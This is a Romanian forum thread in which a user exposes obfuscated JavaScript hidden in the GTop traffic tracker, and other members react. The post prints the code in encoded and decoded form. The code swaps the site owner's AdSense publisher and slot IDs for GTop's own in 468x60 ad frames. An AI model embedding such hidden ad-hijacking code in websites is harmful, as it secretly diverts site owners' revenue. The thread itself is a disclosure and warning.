Iată ce s-a descoperit în codul de urmărire de la GTop

Discutii despre tot ce nu se incadreaza in celelalte categorii.

Moderators: Moderatori ajutatori, Moderatori

Post Reply
User avatar
ultramania
Membru, skill +1
Membru, skill +1
Posts: 115
Joined: 10 Jan 2009, 17:32
Detinator Steam: Da
CS Status: Reclama!
Detinator server CS: Cs.UltraMania.Ro
Has thanked: 3 times
Been thanked: 3 times

27 May 2015, 01:07

Pentru monitorizarea traficului unui site, statistici, analize și comparații este de-ajuns să adaugi pe site-ul propriu un cod de urmărire. Servicii de monitorizare sunt multe, oferite gratuit sau pe bază de abonament.

Dar te-ai gândit ce se poate ascunde într-un cod aparent inofensiv?
Iată cum un asemenea serviciu oferit gratuit de proiectul românesc de monitorizare trafic web GTop te poate afecta financiar, prin modificarea ID-urilor de publisher pentru reclamele AdSense de pe site-ul tău.
„Nu știu dacă a avut cineva vreodată curiozitatea să vadă cum arată js-ul pe care gtop îl încarcă pe site-ul vostru pentru a monitoriza traficul.
Pentru cine vrea să-l vadă, fișierul este aici și, după cum puteți vedea, este comprimat însă poate fi decomprimat foarte ușor folosind acest site.
Curios fiind, l-am decomprimat sa văd și eu cum arată.Totul bine și frumos până am dat de aceste linii:

Code: Select all

var _0x47ca = ["\x67\x6F\x6F\x67\x6C\x65\x5F\x61\x64\x73\x5F\x66\x72\x61\x6D\x65", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", "\x73\x72\x63", "\x6D\x61\x74\x63\x68", "\x63\x61\x2D\x70\x75\x62\x2D\x32\x36\x31\x32\x39\x30\x30\x36\x37\x32\x39\x32\x31\x36\x38\x32", "\x72\x65\x70\x6C\x61\x63\x65", "\x73\x6C\x6F\x74\x6E\x61\x6D\x65\x3D\x31\x39\x33\x34\x37\x33\x30\x38\x30\x33"];
var _0xfcf0 = [_0x47ca[0], _0x47ca[1], _0x47ca[2], _0x47ca[3], _0x47ca[4], _0x47ca[5], _0x47ca[6]];
function sSt() {
  for (i = 1; i <= 4; i++) {
     if (document[_0xfcf0[1]](_0xfcf0[0] + i)) {
         src = document[_0xfcf0[1]](_0xfcf0[0] + i)[_0xfcf0[2]];
         if (src[_0xfcf0[3]](/w=468/) && src[_0xfcf0[3]](/h=60/)) {
             var _0x2266x3 = src[_0xfcf0[5]](/(ca-pub-[0-9]+)/ig, _0xfcf0[4]);
             var _0x2266x3 = _0x2266x3[_0xfcf0[5]](/(slotname=[0-9]+)/ig, _0xfcf0[6]);
             document[_0xfcf0[1]](_0xfcf0[0] + i)[_0xfcf0[2]] = _0x2266x3
         }
     }
  }
};
if (site_id != 41219 && site_id != 23216) sSt();
Cum nu prea îmi place să încarc javascript-uri codate pe site-urile mele fără să știu despre ce e vorba, mi-am bătut puţin capul și am decodat și partea asta de cod, rezultatul obținut fiind acesta:

Code: Select all

var _0x47ca = ["google_ads_frame", "getElementById", "src", "match", "ca-pub-2612900672921682", "replace", "slotname=1934730803"];
var _0xfcf0 = [_0x47ca[0], _0x47ca[1], _0x47ca[2], _0x47ca[3], _0x47ca[4], _0x47ca[5], _0x47ca[6]];
function sSt() 
{    
   for (i = 1; i <= 4; i++) 
   {        
      if (document[_0xfcf0[1]](_0xfcf0[0] + i)) 
      {            
         src = document[_0xfcf0[1]](_0xfcf0[0] + i)[_0xfcf0[2]];            
         if (src[_0xfcf0[3]](/w=468/) && src[_0xfcf0[3]](/h=60/)) 
         {                
            var _0x2266x3 = src[_0xfcf0[5]](/(ca-pub-[0-9]+)/ig, _0xfcf0[4]);
            var _0x2266x3 = _0x2266x3[_0xfcf0[5]](/(slotname=[0-9]+)/ig, _0xfcf0[6]);
            document[_0xfcf0[1]](_0xfcf0[0] + i)[_0xfcf0[2]] = _0x2266x3            
         }        
      }    
   }
};
Mi s-a părut puțin cam ciudat sa vad pe acolo cuvinte precum "google_ads", "ca-pub-2612900672921682", sau "replace" asa ca am făcut câteva replace-uri și am obținut asta:

Code: Select all

var _0x47ca = ["google_ads_frame", "getElementById", "src", "match", "ca-pub-2612900672921682", "replace", "slotname=1934730803"];
var _0xfcf0 = [_0x47ca[0], _0x47ca[1], _0x47ca[2], _0x47ca[3], _0x47ca[4], _0x47ca[5], _0x47ca[6]];
function sSt() 
{    
   for (i = 1; i <= 4; i++) 
   {        
      if (document.getElementById("google_ads_frame" + i)) 
      {            
         src = document.getElementById("google_ads_frame" + i).src;            
         if (src.match(/w=468/) && src.match(/h=60/)) 
         {                
            var _0x2266x3 = src.replace(/(ca-pub-[0-9]+)/ig, "ca-pub-2612900672921682");
            var _0x2266x3 = _0x2266x3.replace(/(slotname=[0-9]+)/ig, "slotname=1934730803");
            document.getElementById("google_ads_frame" + i).src = _0x2266x3            
         }        
      }    
   }
}; 
Știți ce face codul asta (ce făcea de fapt)? Înlocuiește id-urile voastre de la reclamele 468x60 de la Google AdSense cu id-urile celor de la gtop. Cu alte cuvinte înlocuiește RECLAMELE VOASTRE cu RECLAMELE LOR chiar pe SITE-URILE VOASTRE!!!
Am spus "făcea" pentru ca acum AdSense și-a schimbat codurile și micuțul lor script de mai sus nu mai funcționează (cel puțin în testele mele nu a funcționat).
După cum puteți observa, în cod este următorul if : "if (site_id != 41219 && site_id != 23216) sSt();". Ce face acest if ? Ei bine, verifică dacă nu cumva codul este plasat pe unul din site-urile cu id-ul 41219 sau 23216 (id-uri care nu mai sunt active în acest moment), id-uri care presupun ca aparțineau site-urilor unor admini. În cazul în care codul este plasat pe un site cu un alt id fata de cele doua de mai sus, se executa function sSt() care face treaba cu codurile de la AdSense.”

Iată deci, de ce e este recomandat să te informezi temeinic despre schimbările pe care urează să le faci sau să ceri o părere avizată în domeniu înainte a pune orie fel de cod pe site-ul propriu.
Image
See No Evil 2 (2014) Online DVD -> Vizioneaza Online
Filme Online ==> Click Aici!
Seriale Noi 2014 : Click Aici!
Id meu de mess : um_diablo
RoyalServer 2
User avatar
unpack
Membru, skill +4
Membru, skill +4
Posts: 1899
Joined: 07 May 2013, 20:48
Detinator Steam: Da
CS Status: SlowHack Legion.
Detinator server CS: Da
Reputatie: Fost moderator ajutator
Utilizator neserios ( tepar )
Restrictie moderator
Nume anterior: unpackRo, HyperDesk, -Hyperion-
Location: Delphi \ .Net \ C++ \ Php \ Pawn.
Has thanked: 76 times
Been thanked: 70 times
Contact:

27 May 2015, 01:18

Daca site_id nu e 41219 sau site_id nu e 23216 executa functia sSt iar functia sSt vad ca da replace la acele id-uri.Da bine ca acel cod se activeaza doar daca respectivul owner de website isi pune AdSense pe site.

if (site_id != 41219 && site_id != 23216) sSt();

Foloseam si eu Gtop. Josnic. Insa au gandit bine. :meme
www.Ms-Boost.com - Counter-Strike 1.6 Server Boost.

Cu Stima,
Unpack - www.Ms-Boost.com

Image
MARIUSEF
Utilizator banat
Utilizator banat
Posts: 101
Joined: 27 Aug 2014, 20:53
Detinator Steam: Nu
CS Status: Citesc forumul eXtreamCS.com...!
Fond eXtream: 0
Contact:

27 May 2015, 09:40

Interesant!
The Kalu
Fost administrator
Fost administrator
Posts: 13712
Joined: 09 Oct 2010, 12:39
Detinator Steam: Da
CS Status: In grajd!
SteamID: kalulord
Reputatie: Fost Administrator
Fost membru Club eXtreamCS (6 luni)
Nume anterior: Terra
Location: Romania, Ploiesti
Has thanked: 328 times
Been thanked: 646 times
Contact:

27 May 2015, 09:48

Cine va pune sa folositi asa ceva cand aveti google analytics.
Image
User avatar
Mădălin
Administrator
Administrator
Posts: 5295
Joined: 06 Mar 2013, 21:40
Detinator Steam: Nu
Reputatie: Administrator
Fost manager cs.extream.ro
Web designer
Administratorul anului 2023
Has thanked: 45 times
Been thanked: 310 times
Contact:

27 May 2015, 11:17

Wow.. mersi de informare!
User avatar
GamingWorld
Membru eXtream
Membru eXtream
Posts: 2205
Joined: 08 Mar 2012, 00:18
Detinator Steam: Da
CS Status: PHP GOD
Detinator server CS: Da
SteamID: legend_xpc
Reputatie: Membru Club eXtreamCS (8 luni)
Location: Bucuresti
Has thanked: 24 times
Been thanked: 35 times

27 May 2015, 13:12

WOW, ce jegosi :)
Pentru a-l contacta pe userul GamingWorld poti trimite un PM accesand direct profilul meu .
De altfel puteti sa ma gasiti si pe ImageBlog & si ImageYoutube !!
User avatar
Tredash
Membru, skill 0
Membru, skill 0
Posts: 97
Joined: 12 Dec 2014, 18:42
Detinator Steam: Da
CS Status: Ma uit si eu pe aici...
SteamID: haldirgame
Fond eXtream: 0
Location: Londra
Contact:

27 May 2015, 13:15

Mda, ce manarii fac cate unii... putin cam urat dupa parerea mea.
User avatar
sUperstar
Utilizator neserios (tepar)
Utilizator neserios (tepar)
Posts: 3321
Joined: 01 Mar 2013, 23:08
Detinator Steam: Da
Reputatie: Restrictie moderator [abuz de functie]
Fost eXtream mod
Utilizator neserios (tepar!)
Has thanked: 42 times
Been thanked: 97 times

27 May 2015, 13:28

eu tot asa va faceam daca eram in locul lor
RIPPLE FAUCET - Castiga pana la 1 Ripple pe zi!
User avatar
Tredash
Membru, skill 0
Membru, skill 0
Posts: 97
Joined: 12 Dec 2014, 18:42
Detinator Steam: Da
CS Status: Ma uit si eu pe aici...
SteamID: haldirgame
Fond eXtream: 0
Location: Londra
Contact:

27 May 2015, 13:31

Daca tie ti-ar face cineva asa ti-ar conveni? Efectiv ai tine reclamele pentru altii :)
User avatar
sharkstar
Membru, skill +4
Membru, skill +4
Posts: 1735
Joined: 24 Dec 2012, 15:51
Detinator Steam: Da
CS Status: Rupetot
SteamID: privat
Location: Bucuresti
Has thanked: 70 times
Been thanked: 42 times

27 May 2015, 16:38

hahahahahaha.
Odata ce folosesti AdSense.. Pune si tu T5 ...
I've never been more normal than I am now.
My tumblr
CRISZLY
Membru eXtream
Membru eXtream
Posts: 4045
Joined: 14 May 2014, 17:49
Detinator Steam: Da
Reputatie: Nume anterior: Itsirc
Castigator Membru Club eXtream @ Ganduri de sub dus (25 OCT - 25 FEB)
Been thanked: 69 times

27 May 2015, 16:49

Mdea, n-am stiut, mai inainte mi-am eliminat site-ul de la ei.
User avatar
databasehunter
Membru, skill 0
Membru, skill 0
Posts: 91
Joined: 05 May 2015, 20:29
Detinator Steam: Da
Fond eXtream: 0

27 May 2015, 18:04

adevaru e, ca multi dintre voi ,,detineti site-uri cu trafic mare"
gtop e o prostie oricum. si eu l-am folosit, aveam pus doar mini bannerul pentru track, nici nu m-am uitat in sursa ca nu avea rost.
Image
Image
Post Reply

Return to “Discutii generale”

  • Information
  • Who is online

    Users browsing this forum: Bing [Bot], Dot [Bot], Semrush [Bot] and 359 guests